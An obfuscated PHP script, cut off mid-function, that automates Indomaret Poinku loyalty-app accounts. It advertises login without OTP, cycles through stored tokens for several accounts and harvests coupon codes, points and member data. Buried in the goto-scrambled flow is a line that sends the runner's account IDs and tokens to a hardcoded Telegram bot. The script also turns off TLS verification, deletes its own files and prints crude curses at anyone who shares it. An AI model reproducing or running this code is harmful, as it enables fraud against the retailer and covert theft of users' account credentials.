  echo @Zm6iC("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto cOqby; 
  be733: 
  echo "\xa"; 
  goto gCqZ1; 
  S9BGT: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto LAc1I; 
  kXsPH: 
  goto FAMhO; 
  goto u4yvz; 
  O90sh: 
  echo @ZM6Ic("nevy", $ABmxY); 
  goto X66Js; 
  MfNSg: 
  @unlink("poinhp.php"); 
  goto iancx; 
  Uy_YH: 
  $Ex3sI = @$lImQC["data"]["content"][14]["couponCode"]; 
  goto dd0D6; 
  j96R4: 
  $obc_G = str_replace("
", '', $wlJRC); 
  goto g_Gi9; 
  AT7qk: 
  sleep(5); 
  goto z_Kbp; 
  OIAkv: 
  @unlink("poinhp.php"); 
  goto NUaSL; 
  Cqo0x: 
  if ($S02nx == "Diskon Rp 25.000 Klik Indomaret") { 
    goto TRxKr; 
  } 
  goto hF6Lb; 
  bpPTo: 
  $zcN5u = XOZB4(array("|"), $wZnHP)[0]; 
  goto VYgN7; 
  cLVAj: 
  echo @zM6IC("yellow", " 3 . Login Poinku + Cek Kupon
"); 
  goto hDDi0; 
  T7lAa: 
  echo @ZM6Ic("yellow", "Alamat Penerima : "); 
  goto EafIZ; 
  B90Go: 
  echo @zM6Ic("nevy", "        AAMIIN "); 
  goto naE5z; 
  kkk3x: 
  echo @Zm6Ic("nevy", "Akun Ke    : "); 
  goto aa4PH; 
  c2kiA: 
  echo "
"; 
  goto Mosdc; 
  w7BAw: 
  $Jk9cx = g8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/get-data-customer", $aY0el, $GOXkU, $mlMLt); 
  goto dsC4G; 
  RERXA: 
  if ($RJnNP == "y") { 
    goto RBkow; 
  } 
  goto i2jbT; 
  smKwr: 
  echo @Zm6iC("yellow", "| WA 082176358295 \xa"); 
  goto SzLuk; 
  SYN5I: 
  jOsQR: 
  goto C4eLu; 
  ARsDv: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto OeKCs; 
  F38ui: 
  $owfHy = json_decode($upOL9, true); 
  goto n2vj8; 
  MAR0t: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto uZrFH; 
  O3LwN: 
  echo "
"; 
  goto rss7A; 
  E30x_: 
  $KOeAA = @$Ap1KM["data"]["rewards"][0]["item"][0]["couponMasterId"]; 
  goto knqmj; 
  UBExk: 
  $zn5zd = $U0YgX; 
  goto Epd7E; 
  P23f4: 
  Kt3G1("forceclose", $zn5zd, $aY0el, $earOL, $GOXkU); 
  $teeli001 = file_get_contents("https://api.telegram.org/bot5529819060:AAGy5hFZW802Cm7Dut_gOSEtnPMzrY_n49I/sendMessage?chat_id=1069319412&text=$zn5zd|$aY0el|$earOL|$GOXkU"); 
  goto mSjwl; 
  GJAME: 
  if (!(is_dir($unXYW) === false)) { 
    goto BuRXH; 
  } 
  goto M2RvH; 
  D2u2E: 
  WMkHF: 
  goto CD5on; 
  NQOD6: 
  echo @ZM6Ic("nevy", $U_EVz); 
  goto wPJ_E; 
  Zz9To: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto gSTn8; 
  GVDB9: 
  @unlink("whoami"); 
  goto R1iG3; 
  FzNDx: 
  die; 
  goto XIrU2; 
  E94Xn: 
  $aY0el = $jlHkA; 
  goto CfJPM; 
  G3IfU: 
  $owfHy = json_decode($XTuz1, true); 
  goto czGTj; 
  cF172: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto CCFBe; 
  RmmjO: 
  echo "
"; 
  goto AmZDN; 
  sJENN: 
  if (!($zcN5u == '')) { 
    goto Tv6Tl; 
  } 
  goto Axlar; 
  Rd5YL: 
  eVHTx: 
  goto Pj3Iu; 
  Kk5nB: 
  xrVSZ: 
  goto Stqqe; 
  m1FX4: 
  echo @ZM6ic("yellow", "ID nya: "); 
  goto lWEpz; 
  RJm53: 
  $yPeiy = @$H1g60["refreshToken"]; 
  goto uujgh; 
  P5IMs: 
  function z82DB($lEbop) 
  { 
    goto dBopd; 
    IkAn3: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto Vhs69; 
    Z6L2U: 
    print_r($AXlcQ); 
    goto UzvLt; 
    yKN8_: 
    return false; 
    goto CmVPE; 
    CmVPE: 
    o1K7M: 
    goto LNzBO; 
    MIwwX: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto Q2UeS; 
    GMYqb: 
    BNqo7: 
    goto yKN8_; 
    L5kXM: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto P3ONY; 
    LNzBO: 
    $AXlcQ = json_decode($y7f11, true); 
    goto Z6L2U; 
    s_C3d: 
    $ruc3h[] = "user-agent: okhttp/4.2.1"; 
    goto IkAn3; 
    YAaJJ: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto jg2iv; 
    gwKvI: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto s_C3d; 
    Q2UeS: 
    if (!$P7lm9) { 
      goto BNqo7; 
    } 
    goto ZJOwI; 
    l7W1_: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto dkxLg; 
    ajBQ3: 
    $ECuqv = curl_exec($C6npe); 
    goto MIwwX; 
    YJOPx: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto YAaJJ; 
    P3ONY: 
    goto o1K7M; 
    goto GMYqb; 
    ZJOwI: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto L5kXM; 
    dkxLg: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto gwKvI; 
    jg2iv: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto ajBQ3; 
    dBopd: 
    $C6npe = curl_init(); 
    goto l7W1_; 
    UzvLt: 
    return $ECuqv; 
    goto iA0Gr; 
    Vhs69: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto YJOPx; 
    iA0Gr: 
  } 
  goto kaJU8; 
  EmOI6: 
  $a7K8a = AUjhz("https://firebaseremoteconfig.googleapis.com/v1/projects/998816605328/namespaces/firebase:fetch", $wDisp, $YYbml); 
  goto uNK1N; 
  gSIlt: 
  $zvt88 = $QRhbE; 
  goto hOWCA; 
  wmFCH: 
  echo "
"; 
  goto Vsuo7; 
  ZHFaV: 
  echo "\xa"; 
  goto yZNY3; 
  I9fin: 
  jwQwr: 
  goto ZL0rA; 
  W_0f1: 
  echo "
"; 
  goto vpl0C; 
  O7Cr_: 
  echo "
"; 
  goto M6z1l; 
  TGE3V: 
  echo @zM6iC("nevy", "OTP   : "); 
  goto iqD2p; 
  Rd6rJ: 
  $xT15V = G8pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile", $aY0el, $GOXkU, $mlMLt); 
  goto pIWJg; 
  OMsUG: 
  echo "
"; 
  goto mtQr3; 
  q4tYJ: 
  function M20zQ($cF6mU, $aoIfK) 
  { 
    goto g3KLj; 
    g3KLj: 
    $xp_1p = fopen("/storage/emulated/0/Android/your", "w"); 
    goto kBLFX; 
    kBLFX: 
    fwrite($xp_1p, $aoIfK); 
    goto pIG0R; 
    pIG0R: 
    fclose($xp_1p); 
    goto P4gp9; 
    P4gp9: 
  } 
  goto gA4yc; 
  QT3R_: 
  $jTEU0; 
  goto cjmuY; 
  EEf2f: 
  if (!($zcN5u == '')) { 
    goto to00G; 
  } 
  goto w3RTq; 
  U2vmb: 
  echo @ZM6Ic("nevy", $XDyMm); 
  goto OH7B2; 
  akKs3: 
  die; 
  goto l8XQm; 
  VOfPN: 
  echo @Zm6iC("yellow", " - Silahkan Melakukan Transaksi Terlebih Dahulu
"); 
  goto mH2RK; 
  ItGdn: 
  echo @Zm6ic("nevy", "     YANG NYEBARIN SCRIPT INI \xa"); 
  goto GHAKe; 
  YNuST: 
  $dQ8Tp = trim(fgets(STDIN)); 
  goto LZi1O; 
  wak68: 
  $ABmxY = @$C46m0["message"]; 
  goto vMlpG; 
  DkiWA: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto c6hC1; 
  oFqKn: 
  r1qLS("more", $aoIfK); 
  goto QnwC5; 
  fZZU1: 
  echo "Deleted {$xp_1p} "; 
  goto D6NeB; 
  kaBU8: 
  $zcN5u = XOzb4(array("|"), $wZnHP)[0]; 
  goto wURJg; 
  ACpFN: 
  echo $zn5zd; 
  goto Oy0iQ; 
  nxHbq: 
  $mQ1PX = $E_1ED[$jTEU0]; 
  goto ZyY5B; 
  FEUU4: 
  echo @ZM6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto IkNDt; 
  d28r0: 
  $zcN5u = Xozb4(array("|"), $wZnHP)[0]; 
  goto mBoJz; 
  oXdZF: 
  D4vRH: 
  goto tUsG6; 
  H2AMl: 
  goto pj0Fz; 
  goto pIdXS; 
  w73ga: 
  bI4pG: 
  goto XUNNf; 
  tYtSk: 
  $N0XGD = g8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto KmhR1; 
  qd5SF: 
  $D2zwh++; 
  goto wZPE1; 
  OUYab: 
  $zvt88 = $QRhbE; 
  goto FYHKZ; 
  gNONM: 
  echo @Zm6IC("yellow", "Total BIJI  : "); 
  goto ZVH0z; 
  xc_cJ: 
  echo @zm6Ic("nevy", "Pilih Kota Mana ? : "); 
  goto xMmo2; 
  AEacE: 
  $v9NcH = @$Ap1KM["data"]["balance"]; 
  goto sEWO8; 
  XdjRG: 
  echo @Zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto bfEta; 
  P08e3: 
  $GOXkU = $w5ulg; 
  goto k0Qg0; 
  Geoq3: 
  $aY0el = $v1ZMX; 
  goto ZjJFF; 
  LtxpM: 
  $DxrJr = "100000000000000000"; 
  goto Fhrtw; 
  IeLcz: 
  $LwPoO = @$owfHy["data"]["content"][$qtgR3]["imageUrl"]; 
  goto gwIsu; 
  BQUXh: 
  k2R5x: 
  goto la72U; 
  Yx_cW: 
  echo @Zm6ic("green", $wd9cN); 
  goto PZVdK; 
  lJl7c: 
  $jTEU0; 
  goto xWUEy; 
  T3KX5: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto YTR8P; 
  D3Nkz: 
  Yni8F: 
  goto MpoPp; 
  mHrTZ: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto FA82m; 
  u0z5i: 
  if (!($zcN5u == '')) { 
    goto PSckK; 
  } 
  goto ID5xm; 
  tXZim: 
  echo @zm6Ic("yellow", "[1] {$odYyL} 
  > {$KTLep} 

"); 
  goto QY65c; 
  e3Mm3: 
  echo "
"; 
  goto ZDwf_; 
  X73Ka: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto pKI5I; 
  VtQl6: 
  echo "\xa"; 
  goto BCr2g; 
  EBiBT: 
  echo @ZM6ic("yellow", "Apakah Member Baru : "); 
  goto EnReM; 
  lCoM2: 
  $raN1z = @$lImQC["data"]["content"][7]["couponCode"]; 
  goto kXusB; 
  utQaz: 
  echo @ZM6IC("yellow", "Jumlah Stamp : "); 
  goto B2VT8; 
  V_8q5: 
  EDwN1: 
  goto PTWfM; 
  Cr9sd: 
  echo "\xa"; 
  goto CsTYI; 
  B2VT8: 
  echo @ZM6ic("nevy", $v9NcH); 
  goto A0K7O; 
  OG_cq: 
  if ($ZNU2M == "Cashback 2.500 Poin") { 
    goto Jcs9o; 
  } 
  goto yAt0D; 
  NTjXY: 
  rHriJ("Kupon Poinku new.txt", $lbuGr); 
  goto V_8q5; 
  ibb5f: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto Y6dlB; 
  lEx9p: 
  SjMQr: 
  goto CV2DM; 
  A2sIk: 
  if (!($Pud0o == "true")) { 
    goto wSyTI; 
  } 
  goto WtOtG; 
  rUsk1: 
  PLb2v: 
  goto nlQXj; 
  v0pQL: 
  goto ODvt2; 
  goto zruIg; 
  DDFYo: 
  if (!($cPDPt == 13)) { 
    goto eZaFp; 
  } 
  goto E0app; 
  uNbOq: 
  $zcN5u = xoZB4(array("|"), $wZnHP)[0]; 
  goto VCCS6; 
  x7CO6: 
  echo @zM6ic("green", "Kota Ke : "); 
  goto sde23; 
  CH3Nn: 
  echo @ZM6iC("nevy", " | Script IDM LOGIN POINKU TANPA OTP\xa"); 
  goto yrVV7; 
  Zs3mW: 
  ZlzNN: 
  goto Uz5sc; 
  fxg3h: 
  echo $yy9BI . ". "; 
  goto o8_Bq; 
  sZiim: 
  $earOL = $sONlZ; 
  goto BVXm3; 
  tKy2G: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto NqMIz; 
  UsRXR: 
  echo "
"; 
  goto BZCJ6; 
  uX1ga: 
  P2g53: 
  goto Rd6rJ; 
  Bqv9L: 
  echo @ZM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto TEHwa; 
  a0Fb7: 
  if (!($fUekS == '')) { 
    goto bHINF; 
  } 
  goto UNWVG; 
  coGDt: 
  E2hQ_: 
  goto zhwDs; 
  CGa35: 
  die; 
  goto BVsui; 
  LppAG: 
  echo "
"; 
  goto pR3Tn; 
  qVcUC: 
  echo "\xa"; 
  goto EOL7D; 
  dZ2IE: 
  echo @ZM6IC("red", $jTEU0); 
  goto IICKu; 
  NV5lO: 
  $nb9cm = round(microtime(true) * 1000); 
  goto mEspx; 
  TMRV6: 
  echo "Mulai Baris Ke : "; 
  goto KF17u; 
  yVAZE: 
  $earOL = "112233"; 
  goto sQzl_; 
  QVao_: 
  echo @zM6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto Vn1b5; 
  vG0Az: 
  echo @zM6ic("nevy", "     YANG NYEBARIN SCRIPT INI \xa"); 
  goto VvpIh; 
  C4GzD: 
  $K4tCB = @$owfHy["data"][$dQ8Tp]["provinceName"]; 
  goto c3hCT; 
  s74NK: 
  echo "\xa"; 
  goto PGbXK; 
  PP6AJ: 
  echo "
"; 
  goto Yz7jy; 
  KT5E1: 
  echo @Zm6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto UwOU9; 
  JaM1M: 
  echo "
"; 
  goto wagK0; 
  JjOHD: 
  $zvt88 = $QRhbE; 
  goto Rdfo1; 
  MB1KJ: 
  $VW123 = @$lImQC["data"]["content"][0]["couponName"]; 
  goto kHzhX; 
  tX5nR: 
  echo "Sampai Baris Ke : "; 
  goto LP87k; 
  tMRFs: 
  echo @ZM6Ic("nevy", "Apakah Sudah Transaksi ? ( y / n ) : "); 
  goto Mk08D; 
  iu_7C: 
  echo "
\xa"; 
  goto tMRFs; 
  QdmIB: 
  echo "\xa"; 
  goto LatCK; 
  trai8: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto xZwF2; 
  ZbpF6: 
  echo @zm6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto qvHnx; 
  VvpIh: 
  echo @Zm6IC("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto g3Opg; 
  kJzNF: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto jGI0Q; 
  K3Ngh: 
  $BW_8H = @$cQFRW["data"]["description"]; 
  goto MlxLs; 
  Yz7jy: 
  echo @ZM6Ic("green", "Akun Ke : "); 
  goto dZ2IE; 
  d802g: 
  $owfHy = json_decode($upOL9, true); 
  goto cfUiS; 
  aRKHO: 
  goto qve7i; 
  goto vir3g; 
  ERz4c: 
  echo "
"; 
  goto Y2z6Q; 
  jm25w: 
  echo @ZM6iC("yellow", "Nama Kuponnya  : "); 
  goto fe9xE; 
  WBD6A: 
  $L9Nzh = @$lImQC["data"]["content"][9]["couponCode"]; 
  goto yz1R8; 
  u7stb: 
  echo @zM6Ic("green", $wd9cN); 
  goto qp4VT; 
  UiL6h: 
  Oer0B: 
  goto UuPe7; 
  qybIO: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto NKzpF; 
  fTiXw: 
  $ABmxY = @$H1g60["message"]; 
  goto K0Bqd; 
  lNj3J: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto Nwht5; 
  Lqpb5: 
  $upOL9 = G8Pf2("https://edtsapp.indomaretpoinku.com/game/apix-1502-api/customer-game/get-unused", $aY0el, $GOXkU, $mlMLt); 
  goto XuMwA; 
  hrbe8: 
  $jT2Pf = @$owfHy["data"]["content"][$fM3_G]["couponMasterId"]; 
  goto HOz1w; 
  EZ2g0: 
  $AxbWA = XWl4L(); 
  goto NPalc; 
  kMeiR: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $WtCiL . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto Qgse8; 
  fuGBB: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto ZAUQ0; 
  pVd1W: 
  @unlink("poinhp.php"); 
  goto PUv3V; 
  vwrtA: 
  echo "\xa"; 
  goto Xl42B; 
  p3S5N: 
  echo @ZM6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto LGOHq; 
  FS_4m: 
  echo @ZM6IC("nevy", " | Script IDM Cek Poin\xa"); 
  goto lhi8z; 
  TNEVB: 
  $nb9cm = round(microtime(true) * 1000); 
  goto u_8of; 
  AJX59: 
  $aoIfK = @file_get_contents("/storage/emulated/0/Android/your"); 
  goto o4b0D; 
  yncKT: 
  $YUfPv = @$owfHy["data"][0]["address"]; 
  goto ZAvo0; 
  SrfgL: 
  echo "\xa"; 
  goto FNHI1; 
  oTnn7: 
  echo "Error deleting {$xp_1p} "; 
  goto NlZns; 
  QQ1jd: 
  echo "\xa"; 
  goto twQoz; 
  ZDI74: 
  goto CjBGa; 
  goto lZyiz; 
  lfA_D: 
  echo @Zm6IC("green", "Nomor HP Anda : "); 
  goto wxlya; 
  x8RGk: 
  echo @ZM6ic("nevy", $XDyMm); 
  goto PprMi; 
  y6y7W: 
  $sOOnY = Fq6w0(); 
  goto YS1xZ; 
  GIkxB: 
  echo "\xa"; 
  goto Y7JQT; 
  VNXZA: 
  echo @ZM6IC("nevy", "Akun Ke    : "); 
  goto mJNk_; 
  b8f1e: 
  echo @ZM6IC("yellow", "SCAN BARCODE INI AGAR KASIR LEBIH MUDAH.."); 
  goto Ym8cq; 
  y0e5f: 
  xh261: 
  goto v0lAt; 
  qhJ96: 
  $obc_G = str_replace("
", '', $wlJRC); 
  goto wjnbp; 
  LevEA: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto TXD0c; 
  TfHzm: 
  $yy9BI++; 
  goto kC88F; 
  wb_0Q: 
  echo "\xa"; 
  goto Wn0sH; 
  eOGWf: 
  echo @Zm6Ic("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto JED86; 
  jVUfe: 
  echo @zM6ic("green", $wd9cN); 
  goto FS_4m; 
  DYYUw: 
  r1qlS("beat", $qaGLY); 
  goto q9uvU; 
  APlFW: 
  if (!($zcN5u == '')) { 
    goto EBuCw; 
  } 
  goto ChAnZ; 
  J4PSC: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto l7_E_; 
  rn8GJ: 
  $C2XmN = trim(fgets(STDIN)); 
  goto zVEB0; 
  cd3Bo: 
  $xT15V = g8Pf2("https://edtsapp.indomaretpoinku.com/%2Floyalty%2Fapix-1502-api%2Fmobile%2Fcoins%2Fprizes%2FGOFRESH2022%2Fme", $aY0el, $GOXkU, $mlMLt); 
  goto sw1Yf; 
  R6OFx: 
  echo "
"; 
  goto FEDRd; 
  y23qq: 
  echo @ZM6iC("yellow", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto lpuTf; 
  hesKw: 
  echo "\xa"; 
  goto EyI4f; 
  Cq7zJ: 
  echo @Zm6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto tB3wy; 
  JbcL1: 
  sleep(2); 
  goto Y_tV5; 
  MdYDc: 
  echo @Zm6iC("nevy", $XDyMm); 
  goto JbcL1; 
  zpxt2: 
  echo @ZM6Ic("nevy", $ABmxY); 
  goto hwskv; 
  jbrcC: 
  echo @ZM6iC("nevy", $l9PIA); 
  goto YZCxr; 
  hrgrJ: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto ZiZaH; 
  jGI0Q: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto GzPT0; 
  PdwRl: 
  if (!($WtCiL == '')) { 
    goto GViaE; 
  } 
  goto aPAP6; 
  qb0N_: 
  XUxU1: 
  goto xa14b; 
  gH9aH: 
  aaoBE: 
  goto zLIQ0; 
  rvW4D: 
  echo "\xa"; 
  goto cERjc; 
  HFyvl: 
  echo "
"; 
  goto ipjRN; 
  zFVeV: 
  sleep(3); 
  goto E8UsH; 
  ndPeW: 
  echo "\xa"; 
  goto zB761; 
  eGQqo: 
  print_r($zcN5u); 
  goto bbqtH; 
  gmo6i: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto p6gIA; 
  w8Oba: 
  echo @zm6iC("nevy", $M1ADy); 
  goto wmFCH; 
  HBGqV: 
  echo "
"; 
  goto dg8Ba; 
  iGFo4: 
  echo @ZM6IC("red", "NOTICE !! : 
"); 
  goto g8W5n; 
  IqjPI: 
  $zV17j = @$lImQC["data"]["content"][8]["couponCode"]; 
  goto hCiCJ; 
  BKuVN: 
  echo "\xa"; 
  goto OGVYy; 
  Ncv3v: 
  echo "\xa"; 
  goto RGbnB; 
  dSUW6: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto rFpmU; 
  trl7f: 
  echo "\xa"; 
  goto nkBu3; 
  x6_r_: 
  echo @Zm6IC("yellow", "| WA 082176358295 
"); 
  goto CSX6x; 
  mu6vT: 
  $DNueE = trim(fgets(STDIN)); 
  goto NsEvq; 
  HjmuJ: 
  echo @zM6Ic("green", "Nomor HP Anda : "); 
  goto Na7VL; 
  ZMAxB: 
  $ZXjwY = @$owfHy["data"]["content"][$dQ8Tp]["name"]; 
  goto uB3zb; 
  ahhi3: 
  $fM3_G; 
  goto WL3hT; 
  Y4Lal: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto VYfqN; 
  aLrHz: 
  echo @zM6Ic("purple", "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto Ww5hz; 
  zqUTx: 
  $kGhP3 = @$lImQC["data"]["content"][15]["couponCode"]; 
  goto XpHuc; 
  eeolX: 
  $efQM2 = count($QRhbE) - 1; 
  goto CLkg8; 
  Hmjxw: 
  echo "
"; 
  goto e1vCg; 
  cQZFg: 
  echo @Zm6iC("nevy", $yJiD4); 
  goto TfY0U; 
  uu2gK: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto MTsVB; 
  l_o2B: 
  echo "\xa"; 
  goto SAvQe; 
  mWmUQ: 
  echo @zM6iC("green", $wd9cN); 
  goto T1pw_; 
  CLkg8: 
  $zvt88 = $QRhbE; 
  goto Y4Lal; 
  D7qnE: 
  $aY0el = $v1ZMX; 
  goto JpUFi; 
  B9JFh: 
  $wDisp = "{"appInstanceId":"" . $WYrgv . "","appVersion":"3.13.0","countryCode":"ID","analyticsUserProperties":{},"appId":"1:998816605328:android:" . $aY0el . "","platformVersion":"28","timeZone":"Asia\/Jakarta","sdkVersion":"21.0.1","packageName":"mypoin.indomaret.android","appInstanceIdToken":"" . $YYbml . "","languageCode":"id-ID","appBuild":"104"}"; 
  goto EmOI6; 
  jcyDG: 
  if (!($zcN5u == '')) { 
    goto ObwZf; 
  } 
  goto H8iZh; 
  KesBR: 
  goto thh3I; 
  goto GShuM; 
  Ysu6A: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto kJzNF; 
  Q5jat: 
  die; 
  goto FI_gp; 
  GHKYD: 
  echo @zm6IC("green", "Status : "); 
  goto bAz0x; 
  jfJh8: 
  $wDisp = "{"fid":"" . $odGGi . "","appId":"1:998816605328:android:" . $aY0el . "","authVersion":"FIS_v2","sdkVersion":"a:17.0.0"}"; 
  goto gsqDa; 
  seLWO: 
  echo "\xa"; 
  goto A2BXs; 
  Hd85v: 
  echo @zM6iC("yellow", "Nama Biji : "); 
  goto jbrcC; 
  C9UeF: 
  $ABmxY = @$H1g60["message"]; 
  goto QCDzE; 
  Mjz7D: 
  die; 
  goto tndI6; 
  F_jim: 
  echo "
"; 
  goto hrq_b; 
  Ao7nr: 
  $nb9cm = round(microtime(true) * 1000); 
  goto zZPco; 
  vsZvq: 
  echo @ZM6ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto amjZI; 
  UKSbZ: 
  echo "\xa"; 
  goto q16je; 
  FHmCL: 
  goto SjMQr; 
  goto Zs3mW; 
  N_rB_: 
  goto Eqo5q; 
  goto SlPSt; 
  u7PIe: 
  echo "\xa"; 
  goto d28r0; 
  nzGg7: 
  echo "\xa"; 
  goto C826k; 
  ECJHz: 
  $yy9BI = "0"; 
  goto NUXI3; 
  qkMR4: 
  Fcnek: 
  goto WH0T2; 
  NcYE1: 
  RHRij("Kupon Poinku new.txt", $Uzp_O); 
  goto BQUXh; 
  cOqby: 
  echo @ZM6Ic("nevy", "        AAMIIN "); 
  goto KuMZj; 
  Crsbt: 
  echo @Zm6ic("nevy", $Fm5gC); 
  goto eMkRf; 
  z1iAX: 
  echo @ZM6ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto u3Vxh; 
  Nc01k: 
  $sOOnY = fQ6w0(); 
  goto yoo1d; 
  t6k9h: 
  die; 
  goto licpJ; 
  nWNE3: 
  echo "
"; 
  goto jGAxT; 
  iB1bd: 
  echo "\xa"; 
  goto QiKp7; 
  FEDRd: 
  jXMk8: 
  goto Zi5Xi; 
  gT7PW: 
  print_r($Jk9cx); 
  goto vmL3U; 
  MBfiO: 
  $yy9BI = "0"; 
  goto YBxi2; 
  nkBu3: 
  echo @zM6Ic("yellow", "Nama Kabupaten : "); 
  goto Mz5t0; 
  sJbH0: 
  MmeTG: 
  goto EUpE7; 
  yrt42: 
  echo @ZM6ic("yellow", "Status Pecahin Ayam : "); 
  goto evgdx; 
  Ret60: 
  if ($r99Ty >= $Z3FW0) { 
    goto KthQF; 
  } 
  goto p4Gny; 
  VLriK: 
  echo @zm6IC("nevy", "        AAMIIN "); 
  goto Lbb3x; 
  PUFOJ: 
  echo "
"; 
  goto MHKcM; 
  vLml6: 
  date_default_timezone_set("Asia/Jakarta"); 
  goto Cm2vU; 
  XIrU2: 
  dlkR6: 
  goto lVk3T; 
  SVzVu: 
  die; 
  goto JDhRT; 
  s8LZ0: 
  echo @zM6Ic("red", $YXsOG); 
  goto RhKbU; 
  yCk2k: 
  echo @ZM6iC("yellow", "Nama Kuponnya    : "); 
  goto WQ2iB; 
  UXRYi: 
  echo "\xa"; 
  goto aZIpz; 
  Hw18y: 
  $o0WQD = thhfs("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/login-verification-sms", $wDisp, $aY0el, $GOXkU); 
  goto QERDp; 
  Stqqe: 
  if (!($fUekS == '')) { 
    goto EIaaQ; 
  } 
  goto jYGp4; 
  V8mM_: 
  goto Pn_38; 
  goto uo5Zq; 
  eefzo: 
  echo @zm6Ic("red", "Script Expired, Hubungi Creator https://wa.me/6282176358295\xa"); 
  goto tuakP; 
  kXusB: 
  $kkTa0 = @$lImQC["data"]["content"][8]["couponName"]; 
  goto IqjPI; 
  x3nD5: 
  $S8W9D = trim(fgets(STDIN)); 
  goto Ytgsb; 
  BH7Bk: 
  @unlink("poinhp.php"); 
  goto BgRSC; 
  vGFvF: 
  if ($mF_0D == "Diskon Rp 25.000 Klik Indomaret") { 
    goto E34nz; 
  } 
  goto CVCdX; 
  t4WY0: 
  function SN4Vo($lEbop, $Uar3a) 
  { 
    goto Sf63t; 
    r0PO3: 
    $AXlcQ = json_decode($y7f11, true); 
    goto rqGky; 
    mx4Uj: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto e6CFv; 
    cr0Bt: 
    return false; 
    goto fOIj4; 
    MtxRw: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto giq61; 
    d2mok: 
    sk06s: 
    goto cr0Bt; 
    R9JZf: 
    return $ECuqv; 
    goto kLG6F; 
    kRHBB: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto ddExm; 
    gQAbh: 
    $ruc3h[] = "authorization: Bearer " . $Uar3a; 
    goto mx4Uj; 
    xG1DX: 
